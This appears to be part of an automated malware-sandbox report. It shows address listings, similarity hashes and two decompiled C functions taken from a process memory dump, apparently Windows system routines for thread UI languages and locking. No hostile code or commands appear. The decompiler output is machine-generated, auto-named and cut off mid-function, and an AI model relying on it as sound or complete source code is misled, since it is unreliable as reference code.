                                                                                                        0x00af2944
                                                                                                        0x00af2947
                                                                                                        0x00af2948
                                                                                                        0x00af2951
                                                                                                        0x00af2952
                                                                                                        0x00af2958
                                                                                                        0x00af295a
                                                                                                        0x00af2962
                                                                                                        0x00af2963
                                                                                                        0x00af2964
                                                                                                        0x00af2966
                                                                                                        0x00af296c
                                                                                                        0x00af296f
                                                                                                        0x00af2977
                                                                                                        0x00af2978
                                                                                                        0x00af297d
                                                                                                        0x00af297e
                                                                                                        0x00af297f
                                                                                                        0x00af2980
                                                                                                        0x00af2981
                                                                                                        0x00af2982
                                                                                                        0x00af2983
                                                                                                        0x00af2984
                                                                                                        0x00af2985
                                                                                                        0x00af2986
                                                                                                        0x00af2987
                                                                                                        0x00af2988
                                                                                                        0x00af2989
                                                                                                        0x00af298a
                                                                                                        0x00af298b
                                                                                                        0x00af298c
                                                                                                        0x00af298d
                                                                                                        0x00af298e
                                                                                                        0x00af298f
                                                                                                        0x00af2990
                                                                                                        0x00af2992
                                                                                                        0x00af2997
                                                                                                        0x00af29a3
                                                                                                        0x00af29a6
                                                                                                        0x00af29ab
                                                                                                        0x00af29ad
                                                                                                        0x00af29b0
                                                                                                        0x00af29b2
                                                                                                        0x00b35c80
                                                                                                        0x00af29b8
                                                                                                        0x00af29b8
                                                                                                        0x00af29bb
                                                                                                        0x00af29c0
                                                                                                        0x00af29c5
                                                                                                        0x00af29c6
                                                                                                        0x00af29c6
                                                                                                        0x00af29c9
                                                                                                        0x00af29cb
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x00af29cd
                                                                                                        0x00af29d0
                                                                                                        0x00af29d9
                                                                                                        0x00af29db
                                                                                                        0x00af29dd
                                                                                                        0x00af2a7f
                                                                                                        0x00af2a84
                                                                                                        0x00af2a87
                                                                                                        0x00af2a89
                                                                                                        0x00b35ca1
                                                                                                        0x00b35ca3
                                                                                                        0x00000000
                                                                                                        0x00af2a8f
                                                                                                        0x00af2a8f
                                                                                                        0x00000000
                                                                                                        0x00af2a8f
                                                                                                        0x00000000
                                                                                                        0x00af29e3
                                                                                                        0x00af29e3
                                                                                                        0x00af29e3
                                                                                                        0x00000000
                                                                                                        0x00af29e3
                                                                                                        0x00af29dd
                                                                                                        0x00000000
                                                                                                        0x00af29db
                                                                                                        0x00af29e6
                                                                                                        0x00af29e9
                                                                                                        0x00af29eb
                                                                                                        0x00af29ed
                                                                                                        0x00af29f3
                                                                                                        0x00af29f5
                                                                                                        0x00af29f8
                                                                                                        0x00af29fa
                                                                                                        0x00af2a97
                                                                                                        0x00af2a9a
                                                                                                        0x00af2a9d
                                                                                                        0x00af2add
                                                                                                        0x00000000
                                                                                                        0x00af2a9f
                                                                                                        0x00af2aa2
                                                                                                        0x00af2aa5
                                                                                                        0x00af2aa8
                                                                                                        0x00af2aab
                                                                                                        0x00b35cab
                                                                                                        0x00b35caf
                                                                                                        0x00b35cc5
                                                                                                        0x00b35cda
                                                                                                        0x00b35cdc
                                                                                                        0x00b35cdf
                                                                                                        0x00b35ce5
                                                                                                        0x00000000
                                                                                                        0x00b35ceb
                                                                                                        0x00b35ced
                                                                                                        0x00b35cee
                                                                                                        0x00000000
                                                                                                        0x00b35cee
                                                                                                        0x00b35cb1
                                                                                                        0x00b35cb4
                                                                                                        0x00b35cb9
                                                                                                        0x00b35cbb
                                                                                                        0x00000000
                                                                                                        0x00b35cbd
                                                                                                        0x00b35cbd
                                                                                                        0x00000000
                                                                                                        0x00b35cbd
                                                                                                        0x00b35cbb
                                                                                                        0x00af2ab1
                                                                                                        0x00af2ab1
                                                                                                        0x00af2ac4
                                                                                                        0x00af2ac6
                                                                                                        0x00af2ac6
                                                                                                        0x00000000
                                                                                                        0x00af2ac6
                                                                                                        0x00af2aab
                                                                                                        0x00000000
                                                                                                        0x00af2a00
                                                                                                        0x00af2a09
                                                                                                        0x00af2a0e
                                                                                                        0x00af2a21
                                                                                                        0x00af2a24
                                                                                                        0x00af2a35
                                                                                                        0x00af2a3a
                                                                                                        0x00af2a3d
                                                                                                        0x00af2a42
                                                                                                        0x00af2a59
                                                                                                        0x00af2a59
                                                                                                        0x00af2a5c
                                                                                                        0x00af2a5f
                                                                                                        0x00af2a5f
                                                                                                        0x00af29fa
                                                                                                        0x00af29f3
                                                                                                        0x00af2a64
                                                                                                        0x00af2a64
                                                                                                        0x00af2a6b
                                                                                                        0x00af2a6b
                                                                                                        0x00af2a6d
                                                                                                        0x00af2a72
                                                                                                        0x00af2a72
                                                                                                        0x00000000

                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000001.00000002.266159838.0000000000AA0000.00000040.00000001.sdmp, Offset: 00AA0000, based on PE: true
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID: PATH
                                                                                                        • API String ID: 0-1036084923
                                                                                                        • Opcode ID: aca18db0f68d3d4b0ac1a35e1dc4ae54cead1faa22cbefe75e918cfaf701499b
                                                                                                        • Instruction ID: cd1a5900a246b735afd593dc11dd46304020d79098704db82b2c48377655cecc
                                                                                                        • Opcode Fuzzy Hash: aca18db0f68d3d4b0ac1a35e1dc4ae54cead1faa22cbefe75e918cfaf701499b
                                                                                                        • Instruction Fuzzy Hash: CEC18E71E40219ABCB24DF99D881BBEBBF5FF48700F144069F941AB290EB74AD41CB60
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Function 00AFFAB0, Relevance: 1.6, Strings: 1, Instructions: 306COMMON
                                                                                                        Download Yara Rule
                                                                                                        C-Code - Quality: 80%
                                                                                                        			E00AFFAB0(void* __ebx, void* __esi, signed int _a8, signed int _a12) {
				char _v5;
				signed int _v8;
				signed int _v12;
				char _v16;
				char _v17;
				char _v20;
				signed int _v24;
				char _v28;
				char _v32;
				signed int _v40;
				void* __ecx;
				void* __edi;
				void* __ebp;
				signed int _t73;
				intOrPtr* _t75;
				signed int _t77;
				signed int _t79;
				signed int _t81;
				intOrPtr _t83;
				intOrPtr _t85;
				intOrPtr _t86;
				signed int _t91;
				signed int _t94;
				signed int _t95;
				signed int _t96;
				signed int _t106;
				signed int _t108;
				signed int _t114;
				signed int _t116;
				signed int _t118;
				signed int _t122;
				signed int _t123;
				void* _t129;
				signed int _t130;
				void* _t132;
				intOrPtr* _t134;
				signed int _t138;
				signed int _t141;
				signed int _t147;
				intOrPtr _t153;
				signed int _t154;
				signed int _t155;
				signed int _t170;
				void* _t174;
				signed int _t176;
				signed int _t177;

				_t129 = __ebx;
				_push(_t132);
				_push(__esi);
				_t174 = _t132;
				_t73 =  !( *( *(_t174 + 0x18)));
				if(_t73 >= 0) {
					L5:
					return _t73;
				} else {
					E00ADEEF0(0xbb7b60);
					_t134 =  *0xbb7b84; // 0x77f07b80
					_t2 = _t174 + 0x24; // 0x24
					_t75 = _t2;
					if( *_t134 != 0xbb7b80) {
						_push(3);
						asm("int 0x29");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						_push(0xbb7b60);
						_t170 = _v8;
						_v28 = 0;
						_v40 = 0;
						_v24 = 0;
						_v17 = 0;
						_v32 = 0;
						__eflags = _t170 & 0xffff7cf2;
						if((_t170 & 0xffff7cf2) != 0) {
							L43:
							_t77 = 0xc000000d;
						} else {
							_t79 = _t170 & 0x0000000c;
							__eflags = _t79;
							if(_t79 != 0) {
								__eflags = _t79 - 0xc;
								if(_t79 == 0xc) {
									goto L43;
								} else {
									goto L9;
								}
							} else {
								_t170 = _t170 | 0x00000008;
								__eflags = _t170;
								L9:
								_t81 = _t170 & 0x00000300;
								__eflags = _t81 - 0x300;
								if(_t81 == 0x300) {
									goto L43;
								} else {
									_t138 = _t170 & 0x00000001;
									__eflags = _t138;
									_v24 = _t138;
									if(_t138 != 0) {
										__eflags = _t81;
										if(_t81 != 0) {
											goto L43;
										} else {
											goto L11;
										}
									} else {
										L11:
										_push(_t129);
										_t77 = E00AD6D90( &_v20);
										_t130 = _t77;
										__eflags = _t130;
										if(_t130 >= 0) {
											_push(_t174);
											__eflags = _t170 & 0x00000301;
											if((_t170 & 0x00000301) == 0) {
												_t176 = _a8;
												__eflags = _t176;
												if(__eflags == 0) {
													L64:
													_t83 =  *[fs:0x18];
													_t177 = 0;
													__eflags =  *(_t83 + 0xfb8);
													if( *(_t83 + 0xfb8) != 0) {
														E00AD76E2( *((intOrPtr*)( *[fs:0x18] + 0xfb8)));
														 *((intOrPtr*)( *[fs:0x18] + 0xfb8)) = 0;
													}
													 *((intOrPtr*)( *[fs:0x18] + 0xfb8)) = _v12;
													goto L15;
												} else {
													asm("sbb edx, edx");
													_t114 = E00B68938(_t130, _t176, ( ~(_t170 & 4) & 0xffffffaf) + 0x55, _t170, _t176, __eflags);
													__eflags = _t114;
													if(_t114 < 0) {
														_push("*** ASSERT FAILED: Input parameter LanguagesBuffer for function RtlSetThreadPreferredUILanguages is not a valid multi-string!\n");
														E00ACB150();
													}
													_t116 = E00B66D81(_t176,  &_v16);
													__eflags = _t116;
													if(_t116 >= 0) {
														__eflags = _v16 - 2;
														if(_v16 < 2) {
															L56:
															_t118 = E00AD75CE(_v20, 5, 0);
															__eflags = _t118;
															if(_t118 < 0) {
																L67:
																_t130 = 0xc0000017;
																goto L32;
															} else {
																__eflags = _v12;
																if(_v12 == 0) {
																	goto L67;
																} else {
																	_t153 =  *0xbb8638; // 0x0
																	_t122 = L00AD38A4(_t153, _t176, _v16, _t170 | 0x00000002, 0x1a, 5,  &_v12);
																	_t154 = _v12;
																	_t130 = _t122;
																	__eflags = _t130;
																	if(_t130 >= 0) {
																		_t123 =  *(_t154 + 4) & 0x0000ffff;
																		__eflags = _t123;
																		if(_t123 != 0) {
																			_t155 = _a12;
																			__eflags = _t155;
																			if(_t155 != 0) {
																				 *_t155 = _t123;
																			}
																			goto L64;
																		} else {
																			E00AD76E2(_t154);
																			goto L41;
																		}
																	} else {
																		E00AD76E2(_t154);
																		_t177 = 0;
																		goto L18;
																	}
																}
															}
														} else {
															__eflags =  *_t176;
															if( *_t176 != 0) {
																goto L56;
															} else {
																__eflags =  *(_t176 + 2);
																if( *(_t176 + 2) == 0) {
																	goto L64;
																} else {
																	goto L56;
																}
															}
														}
													} else {
														_t130 = 0xc000000d;
														goto L32;
													}
												}
												goto L35;
											} else {
												__eflags = _a8;
												if(_a8 != 0) {
													_t77 = 0xc000000d;
												} else {
													_v5 = 1;
													L00AFFCE3(_v20, _t170);
													_t177 = 0;
													__eflags = 0;
													L15:
													_t85 =  *[fs:0x18];
													__eflags =  *((intOrPtr*)(_t85 + 0xfc0)) - _t177;
													if( *((intOrPtr*)(_t85 + 0xfc0)) == _t177) {
														L18:
														__eflags = _t130;
														if(_t130 != 0) {
															goto L32;
														} else {
															__eflags = _v5 - _t130;
															if(_v5 == _t130) {
																goto L32;
															} else {
																_t86 =  *[fs:0x18];
																__eflags =  *((intOrPtr*)(_t86 + 0xfbc)) - _t177;
																if( *((intOrPtr*)(_t86 + 0xfbc)) != _t177) {
																	_t177 =  *( *( *[fs:0x18] + 0xfbc));
																}
																__eflags = _t177;
																if(_t177 == 0) {
																	L31:
																	__eflags = 0;
																	L00AD70F0(_t170 | 0x00000030,  &_v32, 0,  &_v28);
																	goto L32;
																} else {
																	__eflags = _v24;
																	_t91 =  *(_t177 + 0x20);
																	if(_v24 != 0) {
																		 *(_t177 + 0x20) = _t91 & 0xfffffff9;
																		goto L31;
																	} else {
																		_t141 = _t91 & 0x00000040;
																		__eflags = _t170 & 0x00000100;
																		if((_t170 & 0x00000100) == 0) {
																			__eflags = _t141;
																			if(_t141 == 0) {
																				L74:
																				_t94 = _t91 & 0xfffffffd | 0x00000004;
																				goto L27;
																			} else {
																				_t177 = E00AFFD22(_t177);
																				__eflags = _t177;
																				if(_t177 == 0) {
																					goto L42;
																				} else {
																					_t130 = E00AFFD9B(_t177, 0, 4);
																					__eflags = _t130;
																					if(_t130 != 0) {
																						goto L42;
																					} else {
																						_t68 = _t177 + 0x20;
																						 *_t68 =  *(_t177 + 0x20) & 0xffffffbf;
																						__eflags =  *_t68;
																						_t91 =  *(_t177 + 0x20);
																						goto L74;
																					}
																				}
																			}
																			goto L35;
																		} else {
																			__eflags = _t141;
																			if(_t141 != 0) {
																				_t177 = E00AFFD22(_t177);
																				__eflags = _t177;
																				if(_t177 == 0) {
																					L42:
																					_t77 = 0xc0000001;
																					goto L33;
																				} else {
																					_t130 = E00AFFD9B(_t177, 0, 4);
																					__eflags = _t130;
																					if(_t130 != 0) {
																						goto L42;
																					} else {
																						 *(_t177 + 0x20) =  *(_t177 + 0x20) & 0xffffffbf;
																						_t91 =  *(_t177 + 0x20);
																						goto L26;
																					}
																				}
																				goto L35;
																			} else {
																				L26:
																				_t94 = _t91 & 0xfffffffb | 0x00000002;
																				__eflags = _t94;
																				L27:
																				 *(_t177 + 0x20) = _t94;
																				__eflags = _t170 & 0x00008000;
																				if((_t170 & 0x00008000) != 0) {
																					_t95 = _a12;
																					__eflags = _t95;
																					if(_t95 != 0) {
																						_t96 =  *_t95;
																						__eflags = _t96;
																						if(_t96 != 0) {
																							 *((short*)(_t177 + 0x22)) = 0;
																							_t40 = _t177 + 0x20;
																							 *_t40 =  *(_t177 + 0x20) | _t96 << 0x00000010;
																							__eflags =  *_t40;
																						}
																					}
																				}
																				goto L31;
																			}
																		}
																	}
																}
															}
														}
													} else {
														_t147 =  *( *[fs:0x18] + 0xfc0);
														_t106 =  *(_t147 + 0x20);
														__eflags = _t106 & 0x00000040;
														if((_t106 & 0x00000040) != 0) {
															_t147 = E00AFFD22(_t147);
															__eflags = _t147;
															if(_t147 == 0) {
																L41:
																_t130 = 0xc0000001;
																L32:
																_t77 = _t130;
																goto L33;
															} else {
																 *(_t147 + 0x20) =  *(_t147 + 0x20) & 0xffffffbf;
																_t106 =  *(_t147 + 0x20);
																goto L17;
															}
															goto L35;
														} else {
															L17:
															_t108 = _t106 | 0x00000080;
															__eflags = _t108;
															 *(_t147 + 0x20) = _t108;
															 *( *[fs:0x18] + 0xfc0) = _t147;
															goto L18;
														}
													}
												}
											}
											L33:
										}
									}
								}
							}
						}
						L35:
						return _t77;
					} else {
						 *_t75 = 0xbb7b80;
						 *((intOrPtr*)(_t75 + 4)) = _t134;
						 *_t134 = _t75;
						 *0xbb7b84 = _t75;
						_t73 = E00ADEB70(_t134, 0xbb7b60);
						if( *0xbb7b20 != 0) {
							_t73 =  *( *[fs:0x30] + 0xc);
							if( *((char*)(_t73 + 0x28)) == 0) {
								_t73 = E00ADFF60( *0xbb7b20);
							}
						}
						goto L5;
					}
				}
			}

















































                                                                                                        0x00affab0
                                                                                                        0x00affab2
                                                                                                        0x00affab3
                                                                                                        0x00affab4
                                                                                                        0x00affabc
                                                                                                        0x00affac0
                                                                                                        0x00affb14
                                                                                                        0x00affb17
                                                                                                        0x00affac2
                                                                                                        0x00affac8
                                                                                                        0x00affacd
                                                                                                        0x00affad3
                                                                                                        0x00affad3
                                                                                                        0x00affadd
                                                                                                        0x00affb18
                                                                                                        0x00affb1b
                                                                                                        0x00affb1d
                                                                                                        0x00affb1e
                                                                                                        0x00affb1f
                                                                                                        0x00affb20
                                                                                                        0x00affb21
                                                                                                        0x00affb22
                                                                                                        0x00affb23
                                                                                                        0x00affb24
                                                                                                        0x00affb25
                                                                                                        0x00affb26
                                                                                                        0x00affb27
                                                                                                        0x00affb28
                                                                                                        0x00affb29
                                                                                                        0x00affb2a
                                                                                                        0x00affb2b
                                                                                                        0x00affb2c
                                                                                                        0x00affb2d
                                                                                                        0x00affb2e
                                                                                                        0x00affb2f
                                                                                                        0x00affb3a
                                                                                                        0x00affb3b
                                                                                                        0x00affb3e
                                                                                                        0x00affb41
                                                                                                        0x00affb44
                                                                                                        0x00affb47
                                                                                                        0x00affb4a
                                                                                                        0x00affb4d
                                                                                                        0x00affb53
                                                                                                        0x00b3bdcb
                                                                                                        0x00b3bdcb
                                                                                                        0x00affb59
                                                                                                        0x00affb5b
                                                                                                        0x00affb5b
                                                                                                        0x00affb5e
                                                                                                        0x00b3bdd5
                                                                                                        0x00b3bdd8
                                                                                                        0x00000000
                                                                                                        0x00b3bdda
                                                                                                        0x00000000
                                                                                                        0x00b3bdda
                                                                                                        0x00affb64
                                                                                                        0x00affb64
                                                                                                        0x00affb64
                                                                                                        0x00affb67
                                                                                                        0x00affb6e
                                                                                                        0x00affb70
                                                                                                        0x00affb72
                                                                                                        0x00000000
                                                                                                        0x00affb78
                                                                                                        0x00affb7a
                                                                                                        0x00affb7a
                                                                                                        0x00affb7d
                                                                                                        0x00affb80
                                                                                                        0x00b3bddf
                                                                                                        0x00b3bde1
                                                                                                        0x00000000
                                                                                                        0x00b3bde3
                                                                                                        0x00000000
                                                                                                        0x00b3bde3
                                                                                                        0x00affb86
                                                                                                        0x00affb86
                                                                                                        0x00affb86
                                                                                                        0x00affb8b
                                                                                                        0x00affb90
                                                                                                        0x00affb92
                                                                                                        0x00affb94
                                                                                                        0x00affb9a
                                                                                                        0x00affb9b
                                                                                                        0x00affba1
                                                                                                        0x00b3bde8
                                                                                                        0x00b3bdeb
                                                                                                        0x00b3bded
                                                                                                        0x00b3beb5
                                                                                                        0x00b3beb5
                                                                                                        0x00b3bebb
                                                                                                        0x00b3bebd
                                                                                                        0x00b3bec3
                                                                                                        0x00b3bed2
                                                                                                        0x00b3bedd
                                                                                                        0x00b3bedd
                                                                                                        0x00b3beed
                                                                                                        0x00000000
                                                                                                        0x00b3bdf3
                                                                                                        0x00b3bdfe
                                                                                                        0x00b3be06
                                                                                                        0x00b3be0b
                                                                                                        0x00b3be0d
                                                                                                        0x00b3be0f
                                                                                                        0x00b3be14
                                                                                                        0x00b3be19
                                                                                                        0x00b3be20
                                                                                                        0x00b3be25
                                                                                                        0x00b3be27
                                                                                                        0x00b3be35
                                                                                                        0x00b3be39
                                                                                                        0x00b3be46
                                                                                                        0x00b3be4f
                                                                                                        0x00b3be54
                                                                                                        0x00b3be56
                                                                                                        0x00b3bef8
                                                                                                        0x00b3bef8
                                                                                                        0x00000000
                                                                                                        0x00b3be5c
                                                                                                        0x00b3be5c
                                                                                                        0x00b3be60
                                                                                                        0x00000000
                                                                                                        0x00b3be66
                                                                                                        0x00b3be66
                                                                                                        0x00b3be7f
                                                                                                        0x00b3be84
                                                                                                        0x00b3be87
                                                                                                        0x00b3be89
                                                                                                        0x00b3be8b
                                                                                                        0x00b3be99
                                                                                                        0x00b3be9d
                                                                                                        0x00b3bea0
                                                                                                        0x00b3beac
                                                                                                        0x00b3beaf
                                                                                                        0x00b3beb1
                                                                                                        0x00b3beb3
                                                                                                        0x00b3beb3
                                                                                                        0x00000000
                                                                                                        0x00b3bea2
                                                                                                        0x00b3bea2
                                                                                                        0x00000000
                                                                                                        0x00b3bea2
                                                                                                        0x00b3be8d
                                                                                                        0x00b3be8d
                                                                                                        0x00b3be92
                                                                                                        0x00000000
                                                                                                        0x00b3be92
                                                                                                        0x00b3be8b
                                                                                                        0x00b3be60
                                                                                                        0x00b3be3b
                                                                                                        0x00b3be3b
                                                                                                        0x00b3be3e
                                                                                                        0x00000000
                                                                                                        0x00b3be40
                                                                                                        0x00b3be40
                                                                                                        0x00b3be44
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x00b3be44
                                                                                                        0x00b3be3e
                                                                                                        0x00b3be29
                                                                                                        0x00b3be29
                                                                                                        0x00000000
                                                                                                        0x00b3be29
                                                                                                        0x00b3be27
                                                                                                        0x00000000
                                                                                                        0x00affba7
                                                                                                        0x00affba7
                                                                                                        0x00affbab
                                                                                                        0x00b3bf02
                                                                                                        0x00affbb1
                                                                                                        0x00affbb1
                                                                                                        0x00affbb8
                                                                                                        0x00affbbd
                                                                                                        0x00affbbd
                                                                                                        0x00affbbf
                                                                                                        0x00affbbf
                                                                                                        0x00affbc5
                                                                                                        0x00affbcb
                                                                                                        0x00affbf8
                                                                                                        0x00affbf8
                                                                                                        0x00affbfa
                                                                                                        0x00000000
                                                                                                        0x00affc00
                                                                                                        0x00affc00
                                                                                                        0x00affc03
                                                                                                        0x00000000
                                                                                                        0x00affc09
                                                                                                        0x00affc09
                                                                                                        0x00affc0f
                                                                                                        0x00affc15
                                                                                                        0x00affc23
                                                                                                        0x00affc23
                                                                                                        0x00affc25
                                                                                                        0x00affc27
                                                                                                        0x00affc75
                                                                                                        0x00affc7c
                                                                                                        0x00affc84
                                                                                                        0x00000000
                                                                                                        0x00affc29
                                                                                                        0x00affc29
                                                                                                        0x00affc2d
                                                                                                        0x00affc30
                                                                                                        0x00b3bf0f
                                                                                                        0x00000000
                                                                                                        0x00affc36
                                                                                                        0x00affc38
                                                                                                        0x00affc3b
                                                                                                        0x00affc41
                                                                                                        0x00b3bf17
                                                                                                        0x00b3bf19
                                                                                                        0x00b3bf48
                                                                                                        0x00b3bf4b
                                                                                                        0x00000000
                                                                                                        0x00b3bf1b
                                                                                                        0x00b3bf22
                                                                                                        0x00b3bf24
                                                                                                        0x00b3bf26
                                                                                                        0x00000000
                                                                                                        0x00b3bf2c
                                                                                                        0x00b3bf37
                                                                                                        0x00b3bf39
                                                                                                        0x00b3bf3b
                                                                                                        0x00000000
                                                                                                        0x00b3bf41
                                                                                                        0x00b3bf41
                                                                                                        0x00b3bf41
                                                                                                        0x00b3bf41
                                                                                                        0x00b3bf45
                                                                                                        0x00000000
                                                                                                        0x00b3bf45
                                                                                                        0x00b3bf3b
                                                                                                        0x00b3bf26
                                                                                                        0x00000000
                                                                                                        0x00affc47
                                                                                                        0x00affc47
                                                                                                        0x00affc49
                                                                                                        0x00affcb2
                                                                                                        0x00affcb4
                                                                                                        0x00affcb6
                                                                                                        0x00affcdc
                                                                                                        0x00affcdc
                                                                                                        0x00000000
                                                                                                        0x00affcb8
                                                                                                        0x00affcc3
                                                                                                        0x00affcc5
                                                                                                        0x00affcc7
                                                                                                        0x00000000
                                                                                                        0x00affcc9
                                                                                                        0x00affcc9
                                                                                                        0x00affccd
                                                                                                        0x00000000
                                                                                                        0x00affccd
                                                                                                        0x00affcc7
                                                                                                        0x00000000
                                                                                                        0x00affc4b
                                                                                                        0x00affc4b
                                                                                                        0x00affc4e
                                                                                                        0x00affc4e
                                                                                                        0x00affc51
                                                                                                        0x00affc51
                                                                                                        0x00affc54
                                                                                                        0x00affc5a
                                                                                                        0x00affc5c
                                                                                                        0x00affc5f
                                                                                                        0x00affc61
                                                                                                        0x00affc63
                                                                                                        0x00affc65
                                                                                                        0x00affc67
                                                                                                        0x00affc6e
                                                                                                        0x00affc72
                                                                                                        0x00affc72
                                                                                                        0x00affc72
                                                                                                        0x00affc72
                                                                                                        0x00affc67
                                                                                                        0x00affc61
                                                                                                        0x00000000
                                                                                                        0x00affc5a
                                                                                                        0x00affc49
                                                                                                        0x00affc41
                                                                                                        0x00affc30
                                                                                                        0x00affc27
                                                                                                        0x00affc03
                                                                                                        0x00affbcd
                                                                                                        0x00affbd3
                                                                                                        0x00affbd9
                                                                                                        0x00affbdc
                                                                                                        0x00affbde
                                                                                                        0x00affc99
                                                                                                        0x00affc9b
                                                                                                        0x00affc9d
                                                                                                        0x00affcd5
                                                                                                        0x00affcd5
                                                                                                        0x00affc89
                                                                                                        0x00affc89
                                                                                                        0x00000000
                                                                                                        0x00affc9f
                                                                                                        0x00affc9f
                                                                                                        0x00affca3
                                                                                                        0x00000000
                                                                                                        0x00affca3
                                                                                                        0x00000000
                                                                                                        0x00affbe4
                                                                                                        0x00affbe4
                                                                                                        0x00affbe4
                                                                                                        0x00affbe4
                                                                                                        0x00affbe9
                                                                                                        0x00affbf2
                                                                                                        0x00000000
                                                                                                        0x00affbf2
                                                                                                        0x00affbde
                                                                                                        0x00affbcb
                                                                                                        0x00affbab
                                                                                                        0x00affc8b
                                                                                                        0x00affc8b
                                                                                                        0x00affc8c
                                                                                                        0x00affb80
                                                                                                        0x00affb72
                                                                                                        0x00affb5e
                                                                                                        0x00affc8d
                                                                                                        0x00affc91
                                                                                                        0x00affadf
                                                                                                        0x00affadf
                                                                                                        0x00affae1
                                                                                                        0x00affae4
                                                                                                        0x00affae7
                                                                                                        0x00affaec
                                                                                                        0x00affaf8
                                                                                                        0x00affb00
                                                                                                        0x00affb07
                                                                                                        0x00affb0f
                                                                                                        0x00affb0f
                                                                                                        0x00affb07
                                                                                                        0x00000000
                                                                                                        0x00affaf8
                                                                                                        0x00affadd

                                                                                                        Strings
                                                                                                        • *** ASSERT FAILED: Input parameter LanguagesBuffer for function RtlSetThreadPreferredUILanguages is not a valid multi-string!, xrefs: 00B3BE0F
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000001.00000002.266159838.0000000000AA0000.00000040.00000001.sdmp, Offset: 00AA0000, based on PE: true
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID: *** ASSERT FAILED: Input parameter LanguagesBuffer for function RtlSetThreadPreferredUILanguages is not a valid multi-string!
                                                                                                        • API String ID: 0-865735534
                                                                                                        • Opcode ID: 040aff7ee6d4cf4a430d59b488dd429a48a640fd783ff41936ec64ce799941a3
                                                                                                        • Instruction ID: 61d29bdc157d8739c11d6f77ab0faf8fe45c058cf9a4469c187ea46faf9fbde4
                                                                                                        • Opcode Fuzzy Hash: 040aff7ee6d4cf4a430d59b488dd429a48a640fd783ff41936ec64ce799941a3
                                                                                                        • Instruction Fuzzy Hash: D8A1B171A006198FDB25DFA8C450BBAB3B5AF48710F1445BAFA46DB691EB30DC42CB90
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Function 00AC2D8A, Relevance: 1.4, Strings: 1, Instructions: 191COMMON
                                                                                                        Download Yara Rule
                                                                                                        C-Code - Quality: 63%
                                                                                                        			E00AC2D8A(void* __ebx, signed char __ecx, signed int __edx, signed int __edi) {
				signed char _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				intOrPtr _v28;
				intOrPtr _v32;
				signed int _v52;
				void* __esi;
				void* __ebp;
				intOrPtr _t55;
				signed int _t57;
				signed int _t58;
				char* _t62;
				signed char* _t63;
				signed char* _t64;
				signed int _t67;
				signed int _t72;
				signed int _t77;
				signed int _t78;
				signed int _t88;
				intOrPtr _t89;
				signed char _t93;
				signed int _t97;
				signed int _t98;
				signed int _t102;
				signed int _t103;
				intOrPtr _t104;
				signed int _t105;
				signed int _t106;
				signed char _t109;
				signed int _t111;
				void* _t116;

				_t102 = __edi;
				_t97 = __edx;
				_v12 = _v12 & 0x00000000;
				_t55 =  *[fs:0x18];
				_t109 = __ecx;
				_v8 = __edx;
				_t86 = 0;
				_v32 = _t55;
				_v24 = 0;
				_push(__edi);
				if(__ecx == 0xbb5350) {
					_t86 = 1;
					_v24 = 1;
					 *((intOrPtr*)(_t55 + 0xf84)) = 1;
				}
				_t103 = _t102 | 0xffffffff;
				if( *0xbb7bc8 != 0) {
					_push(0xc000004b);
					_push(_t103);
					E00B097C0();
				}
				if( *0xbb79c4 != 0) {
					_t57 = 0;
				} else {
					_t57 = 0xbb79c8;
				}
				_v16 = _t57;
				if( *((intOrPtr*)(_t109 + 0x10)) == 0) {
					_t93 = _t109;
					L23();
				}
				_t58 =  *_t109;
				if(_t58 == _t103) {
					__eflags =  *(_t109 + 0x14) & 0x01000000;
					_t58 = _t103;
					if(__eflags == 0) {
						_t93 = _t109;
						E00AF1624(_t86, __eflags);
						_t58 =  *_t109;
					}
				}
				_v20 = _v20 & 0x00000000;
				if(_t58 != _t103) {
					 *((intOrPtr*)(_t58 + 0x14)) =  *((intOrPtr*)(_t58 + 0x14)) + 1;
				}
				_t104 =  *((intOrPtr*)(_t109 + 0x10));
				_t88 = _v16;
				_v28 = _t104;
				L9:
				while(1) {
					if(E00AE7D50() != 0) {
						_t62 = ( *[fs:0x30])[0x50] + 0x228;
					} else {
						_t62 = 0x7ffe0382;
					}
					if( *_t62 != 0) {
						_t63 =  *[fs:0x30];
						__eflags = _t63[0x240] & 0x00000002;
						if((_t63[0x240] & 0x00000002) != 0) {
							_t93 = _t109;
							E00B5FE87(_t93);
						}
					}
					if(_t104 != 0xffffffff) {
						_push(_t88);
						_push(0);
						_push(_t104);
						_t64 = E00B09520();
						goto L15;
					} else {
						while(1) {
							_t97 =  &_v8;
							_t64 = E00AFE18B(_t109 + 4, _t97, 4, _t88, 0);
							if(_t64 == 0x102) {
								break;
							}
							_t93 =  *(_t109 + 4);
							_v8 = _t93;
							if((_t93 & 0x00000002) != 0) {
								continue;
							}
							L15:
							if(_t64 == 0x102) {
								break;
							}
							_t89 = _v24;
							if(_t64 < 0) {
								L00B1DF30(_t93, _t97, _t64);
								_push(_t93);
								_t98 = _t97 | 0xffffffff;
								__eflags =  *0xbb6901;
								_push(_t109);
								_v52 = _t98;
								if( *0xbb6901 != 0) {
									_push(0);
									_push(1);
									_push(0);
									_push(0x100003);
									_push( &_v12);
									_t72 = E00B09980();
									__eflags = _t72;
									if(_t72 < 0) {
										_v12 = _t98 | 0xffffffff;
									}
								}
								asm("lock cmpxchg [ecx], edx");
								_t111 = 0;
								__eflags = 0;
								if(0 != 0) {
									__eflags = _v12 - 0xffffffff;
									if(_v12 != 0xffffffff) {
										_push(_v12);
										E00B095D0();
									}
								} else {
									_t111 = _v12;
								}
								return _t111;
							} else {
								if(_t89 != 0) {
									 *((intOrPtr*)(_v32 + 0xf84)) = 0;
									_t77 = E00AE7D50();
									__eflags = _t77;
									if(_t77 == 0) {
